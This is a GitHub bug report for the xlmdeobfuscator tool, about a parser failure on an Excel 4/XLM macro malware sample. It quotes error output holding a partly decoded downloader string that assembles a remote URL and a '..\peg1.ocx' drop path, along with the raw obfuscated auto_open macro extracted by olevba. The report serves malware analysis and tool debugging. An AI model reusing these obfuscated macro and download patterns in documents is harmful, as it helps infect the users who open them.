-
-
Notifications
You must be signed in to change notification settings - Fork 115
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111
Labels
bug
Something isn't working
Comments
https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Running xlmdeobfuscator on this file:
https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1
gives the following error:
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'KBRSBTL'!$J$1
[Starting Deobfuscation]
CELL:J12 , FullEvaluation , "False"
Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69.
Expected one of:
* MULTIOP
* ADDITIVEOP
* CMPOP
* LIST_SEPARATOR
* L_PRA
* R_PRA
* CONCATOP
Previous tokens: [Token('STRING', '"http=TEXT(((((((((("')]
The raw XLM macro, as extracted by olevba, is:
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: KBRSBTL, Macrosheet
' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1
The text was updated successfully, but these errors were encountered: